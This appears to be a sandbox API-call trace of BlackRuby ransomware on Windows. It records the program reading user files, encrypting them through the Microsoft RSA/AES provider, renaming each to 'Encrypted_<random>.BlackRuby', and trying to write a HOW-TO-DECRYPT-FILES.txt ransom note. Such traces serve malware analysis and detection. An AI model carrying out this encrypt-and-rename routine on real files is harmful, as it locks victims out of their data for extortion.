lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.584] GetLastError () returned 0x5 [0050.584] SetErrorMode (uMode=0x1) returned 0x0 [0050.584] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.584] GetLastError () returned 0x5 [0050.585] SetErrorMode (uMode=0x0) returned 0x1 [0050.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\6aPm.m4a", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\6aPm.m4a", lpFilePart=0x0) returned 0x29 [0050.585] GetLastError () returned 0x5 [0050.585] SetErrorMode (uMode=0x1) returned 0x0 [0050.585] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\6aPm.m4a" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\6apm.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1c13370 | out: lpFileInformation=0x1c13370*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ed2b740, ftCreationTime.dwHighDateTime=0x1d35510, ftLastAccessTime.dwLowDateTime=0x1c12d3b0, ftLastAccessTime.dwHighDateTime=0x1d350cd, ftLastWriteTime.dwLowDateTime=0x1c12d3b0, ftLastWriteTime.dwHighDateTime=0x1d350cd, nFileSizeHigh=0x0, nFileSizeLow=0xe248)) returned 1 [0050.586] GetLastError () returned 0x5 [0050.586] SetErrorMode (uMode=0x0) returned 0x1 [0050.586] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.586] GetLastError () returned 0x5 [0050.586] SetErrorMode (uMode=0x1) returned 0x0 [0050.586] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.586] GetLastError () returned 0x5 [0050.587] SetErrorMode (uMode=0x0) returned 0x1 [0050.587] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", lpFilePart=0x0) returned 0x32 [0050.587] GetLastError () returned 0x5 [0050.587] SetErrorMode (uMode=0x1) returned 0x0 [0050.587] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\a2bzxbtcfxyge.gif"), fInfoLevelId=0x0, lpFileInformation=0x1c30eac | out: lpFileInformation=0x1c30eac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a8bb230, ftCreationTime.dwHighDateTime=0x1d35a55, ftLastAccessTime.dwLowDateTime=0x479063e0, ftLastAccessTime.dwHighDateTime=0x1d35276, ftLastWriteTime.dwLowDateTime=0x479063e0, ftLastWriteTime.dwHighDateTime=0x1d35276, nFileSizeHigh=0x0, nFileSizeLow=0x16d51)) returned 1 [0050.587] GetLastError () returned 0x5 [0050.587] SetErrorMode (uMode=0x0) returned 0x1 [0050.587] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", lpFilePart=0x0) returned 0x32 [0050.587] GetLastError () returned 0x5 [0050.587] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", lpFilePart=0x0) returned 0x32 [0050.587] GetLastError () returned 0x5 [0050.587] SetErrorMode (uMode=0x1) returned 0x0 [0050.588] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\a2bzxbtcfxyge.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.588] GetLastError () returned 0x0 [0050.588] GetFileType (hFile=0x184) returned 0x1 [0050.588] SetErrorMode (uMode=0x0) returned 0x1 [0050.588] GetFileType (hFile=0x184) returned 0x1 [0050.588] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x16d51 [0050.588] GetLastError () returned 0x0 [0050.588] ReadFile (in: hFile=0x184, lpBuffer=0x2b57a70, nNumberOfBytesToRead=0x16d51, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2b57a70*, lpNumberOfBytesRead=0x18ed18*=0x16d51, lpOverlapped=0x0) returned 1 [0050.589] GetLastError () returned 0x0 [0050.589] CloseHandle (hObject=0x184) returned 1 [0050.589] GetLastError () returned 0x0 [0050.590] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", lpFilePart=0x0) returned 0x32 [0050.590] GetLastError () returned 0x0 [0050.590] SetErrorMode (uMode=0x1) returned 0x0 [0050.590] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\a2bzxbtcfxyge.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a8bb230, ftCreationTime.dwHighDateTime=0x1d35a55, ftLastAccessTime.dwLowDateTime=0x479063e0, ftLastAccessTime.dwHighDateTime=0x1d35276, ftLastWriteTime.dwLowDateTime=0x479063e0, ftLastWriteTime.dwHighDateTime=0x1d35276, nFileSizeHigh=0x0, nFileSizeLow=0x16d51)) returned 1 [0050.590] GetLastError () returned 0x0 [0050.590] SetErrorMode (uMode=0x0) returned 0x1 [0050.590] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0050.590] GetLastError () returned 0x0 [0050.624] CryptImportKey (in: hProv=0x37c790, pbData=0x1c8cc90, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ea0) returned 1 [0050.624] GetLastError () returned 0x0 [0050.624] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.624] GetLastError () returned 0x0 [0050.630] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.630] GetLastError () returned 0x0 [0050.630] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360da0) returned 1 [0050.630] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.630] GetLastError () returned 0x0 [0050.630] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1cb9cdc*=0x1, dwFlags=0x0) returned 1 [0050.630] GetLastError () returned 0x0 [0050.630] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1cb9ca8, dwFlags=0x0) returned 1 [0050.630] GetLastError () returned 0x0 [0050.631] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b85650*, pdwDataLen=0x18ed08*=0x16e50, dwBufLen=0x16e50 | out: pbData=0x2b85650*, pdwDataLen=0x18ed08*=0x16e50) returned 1 [0050.631] GetLastError () returned 0x0 [0050.632] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb9d38*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cb9d38*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.632] GetLastError () returned 0x0 [0050.632] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cb9d68*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cb9d68*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.632] GetLastError () returned 0x0 [0050.634] CryptDestroyKey (hKey=0x360ea0) returned 1 [0050.634] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.634] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.634] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", lpFilePart=0x0) returned 0x32 [0050.634] GetLastError () returned 0x0 [0050.634] SetErrorMode (uMode=0x1) returned 0x0 [0050.634] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\a2bzxbtcfxyge.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.635] GetLastError () returned 0xb7 [0050.635] GetFileType (hFile=0x184) returned 0x1 [0050.635] SetErrorMode (uMode=0x0) returned 0x1 [0050.635] GetFileType (hFile=0x184) returned 0x1 [0050.638] CloseHandle (hObject=0x184) returned 1 [0050.638] GetLastError () returned 0xb7 [0050.638] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif", lpFilePart=0x0) returned 0x32 [0050.638] GetLastError () returned 0xb7 [0050.638] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_e6ay4bkWn5Ed6MMzvbwf7m4wT6QBqrV1Am1uU.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_e6ay4bkWn5Ed6MMzvbwf7m4wT6QBqrV1Am1uU.BlackRuby", lpFilePart=0x0) returned 0x5a [0050.638] GetLastError () returned 0xb7 [0050.638] SetErrorMode (uMode=0x1) returned 0x0 [0050.639] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\a2bzxbtcfxyge.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a8bb230, ftCreationTime.dwHighDateTime=0x1d35a55, ftLastAccessTime.dwLowDateTime=0x479063e0, ftLastAccessTime.dwHighDateTime=0x1d35276, ftLastWriteTime.dwLowDateTime=0x2661e0a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x16e60)) returned 1 [0050.639] GetLastError () returned 0xb7 [0050.639] SetErrorMode (uMode=0x0) returned 0x1 [0050.639] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\a2bzXbtCfxyGe.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\a2bzxbtcfxyge.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_e6ay4bkWn5Ed6MMzvbwf7m4wT6QBqrV1Am1uU.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_e6ay4bkwn5ed6mmzvbwf7m4wt6qbqrv1am1uu.blackruby")) returned 1 [0050.639] GetLastError () returned 0xb7 [0050.639] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.639] GetLastError () returned 0xb7 [0050.639] SetErrorMode (uMode=0x1) returned 0x0 [0050.639] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.640] GetLastError () returned 0x5 [0050.640] SetErrorMode (uMode=0x0) returned 0x1 [0050.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", lpFilePart=0x0) returned 0x30 [0050.641] GetLastError () returned 0x5 [0050.641] SetErrorMode (uMode=0x1) returned 0x0 [0050.641] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ffvl2a5m e.docx"), fInfoLevelId=0x0, lpFileInformation=0x1cd703c | out: lpFileInformation=0x1cd703c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ad78690, ftCreationTime.dwHighDateTime=0x1d34cfa, ftLastAccessTime.dwLowDateTime=0x8debbd70, ftLastAccessTime.dwHighDateTime=0x1d350a1, ftLastWriteTime.dwLowDateTime=0x8debbd70, ftLastWriteTime.dwHighDateTime=0x1d350a1, nFileSizeHigh=0x0, nFileSizeLow=0xcf92)) returned 1 [0050.641] GetLastError () returned 0x5 [0050.641] SetErrorMode (uMode=0x0) returned 0x1 [0050.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", lpFilePart=0x0) returned 0x30 [0050.641] GetLastError () returned 0x5 [0050.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", lpFilePart=0x0) returned 0x30 [0050.641] GetLastError () returned 0x5 [0050.641] SetErrorMode (uMode=0x1) returned 0x0 [0050.641] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ffvl2a5m e.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.641] GetLastError () returned 0x0 [0050.641] GetFileType (hFile=0x184) returned 0x1 [0050.641] SetErrorMode (uMode=0x0) returned 0x1 [0050.641] GetFileType (hFile=0x184) returned 0x1 [0050.641] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xcf92 [0050.641] GetLastError () returned 0x0 [0050.641] ReadFile (in: hFile=0x184, lpBuffer=0x1cd8db8, nNumberOfBytesToRead=0xcf92, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1cd8db8*, lpNumberOfBytesRead=0x18ed18*=0xcf92, lpOverlapped=0x0) returned 1 [0050.643] GetLastError () returned 0x0 [0050.643] CloseHandle (hObject=0x184) returned 1 [0050.643] GetLastError () returned 0x0 [0050.643] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", lpFilePart=0x0) returned 0x30 [0050.643] GetLastError () returned 0x0 [0050.643] SetErrorMode (uMode=0x1) returned 0x0 [0050.643] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ffvl2a5m e.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ad78690, ftCreationTime.dwHighDateTime=0x1d34cfa, ftLastAccessTime.dwLowDateTime=0x8debbd70, ftLastAccessTime.dwHighDateTime=0x1d350a1, ftLastWriteTime.dwLowDateTime=0x8debbd70, ftLastWriteTime.dwHighDateTime=0x1d350a1, nFileSizeHigh=0x0, nFileSizeLow=0xcf92)) returned 1 [0050.643] GetLastError () returned 0x0 [0050.643] SetErrorMode (uMode=0x0) returned 0x1 [0050.682] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b5acf8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360de0) returned 1 [0050.683] GetLastError () returned 0x0 [0050.683] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.683] GetLastError () returned 0x0 [0050.691] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.691] GetLastError () returned 0x0 [0050.692] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360e20) returned 1 [0050.692] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.692] GetLastError () returned 0x0 [0050.692] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1b87d44*=0x1, dwFlags=0x0) returned 1 [0050.692] GetLastError () returned 0x0 [0050.692] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1b87d10, dwFlags=0x0) returned 1 [0050.692] GetLastError () returned 0x0 [0050.692] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b87d8c*, pdwDataLen=0x18ed08*=0xd090, dwBufLen=0xd090 | out: pbData=0x1b87d8c*, pdwDataLen=0x18ed08*=0xd090) returned 1 [0050.692] GetLastError () returned 0x0 [0050.692] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba1ed8*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1ba1ed8*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.692] GetLastError () returned 0x0 [0050.692] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ba1f08*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1ba1f08*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.692] GetLastError () returned 0x0 [0050.693] CryptDestroyKey (hKey=0x360de0) returned 1 [0050.693] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0050.693] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0050.693] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", lpFilePart=0x0) returned 0x30 [0050.693] GetLastError () returned 0x0 [0050.693] SetErrorMode (uMode=0x1) returned 0x0 [0050.696] GetFileType (hFile=0x184) returned 0x1 [0050.696] SetErrorMode (uMode=0x0) returned 0x1 [0050.697] GetFileType (hFile=0x184) returned 0x1 [0050.699] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx", lpFilePart=0x0) returned 0x30 [0050.699] GetLastError () returned 0xb7 [0050.699] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_qQoyENqCekdGLl54MHwuJFi2LOqJmlpwjQgHkN5JPo.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_qQoyENqCekdGLl54MHwuJFi2LOqJmlpwjQgHkN5JPo.BlackRuby", lpFilePart=0x0) returned 0x5f [0050.699] GetLastError () returned 0xb7 [0050.699] SetErrorMode (uMode=0x1) returned 0x0 [0050.699] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ffvl2a5m e.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ad78690, ftCreationTime.dwHighDateTime=0x1d34cfa, ftLastAccessTime.dwLowDateTime=0x8debbd70, ftLastAccessTime.dwHighDateTime=0x1d350a1, ftLastWriteTime.dwLowDateTime=0x266b6620, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xd0a0)) returned 1 [0050.699] GetLastError () returned 0xb7 [0050.700] SetErrorMode (uMode=0x0) returned 0x1 [0050.700] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FfVl2a5M E.docx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ffvl2a5m e.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_qQoyENqCekdGLl54MHwuJFi2LOqJmlpwjQgHkN5JPo.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_qqoyenqcekdgll54mhwujfi2loqjmlpwjqghkn5jpo.blackruby")) returned 1 [0050.700] GetLastError () returned 0xb7 [0050.700] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.700] GetLastError () returned 0xb7 [0050.700] SetErrorMode (uMode=0x1) returned 0x0 [0050.701] SetErrorMode (uMode=0x0) returned 0x1 [0050.702] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", lpFilePart=0x0) returned 0x2f [0050.702] GetLastError () returned 0x5 [0050.702] SetErrorMode (uMode=0x1) returned 0x0 [0050.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\fivmtynk9l.wav"), fInfoLevelId=0x0, lpFileInformation=0x1bcc288 | out: lpFileInformation=0x1bcc288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a447300, ftCreationTime.dwHighDateTime=0x1d35070, ftLastAccessTime.dwLowDateTime=0xbe7e34a0, ftLastAccessTime.dwHighDateTime=0x1d34c90, ftLastWriteTime.dwLowDateTime=0xbe7e34a0, ftLastWriteTime.dwHighDateTime=0x1d34c90, nFileSizeHigh=0x0, nFileSizeLow=0x15385)) returned 1 [0050.702] GetLastError () returned 0x5 [0050.702] SetErrorMode (uMode=0x0) returned 0x1 [0050.702] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", lpFilePart=0x0) returned 0x2f [0050.702] GetLastError () returned 0x5 [0050.702] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", lpFilePart=0x0) returned 0x2f [0050.702] GetLastError () returned 0x5 [0050.702] SetErrorMode (uMode=0x1) returned 0x0 [0050.702] GetFileType (hFile=0x184) returned 0x1 [0050.702] SetErrorMode (uMode=0x0) returned 0x1 [0050.702] GetFileType (hFile=0x184) returned 0x1 [0050.702] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x15385 [0050.702] GetLastError () returned 0x0 [0050.703] ReadFile (in: hFile=0x184, lpBuffer=0x2c1aa10, nNumberOfBytesToRead=0x15385, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2c1aa10*, lpNumberOfBytesRead=0x18ed18*=0x15385, lpOverlapped=0x0) returned 1 [0050.704] GetLastError () returned 0x0 [0050.704] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", lpFilePart=0x0) returned 0x2f [0050.704] GetLastError () returned 0x0 [0050.704] SetErrorMode (uMode=0x1) returned 0x0 [0050.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\fivmtynk9l.wav"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a447300, ftCreationTime.dwHighDateTime=0x1d35070, ftLastAccessTime.dwLowDateTime=0xbe7e34a0, ftLastAccessTime.dwHighDateTime=0x1d34c90, ftLastWriteTime.dwLowDateTime=0xbe7e34a0, ftLastWriteTime.dwHighDateTime=0x1d34c90, nFileSizeHigh=0x0, nFileSizeLow=0x15385)) returned 1 [0050.705] GetLastError () returned 0x0 [0050.705] SetErrorMode (uMode=0x0) returned 0x1 [0050.715] CryptImportKey (in: hProv=0x37c790, pbData=0x1c281d4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ae0) returned 1 [0050.715] GetLastError () returned 0x0 [0050.715] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.715] GetLastError () returned 0x0 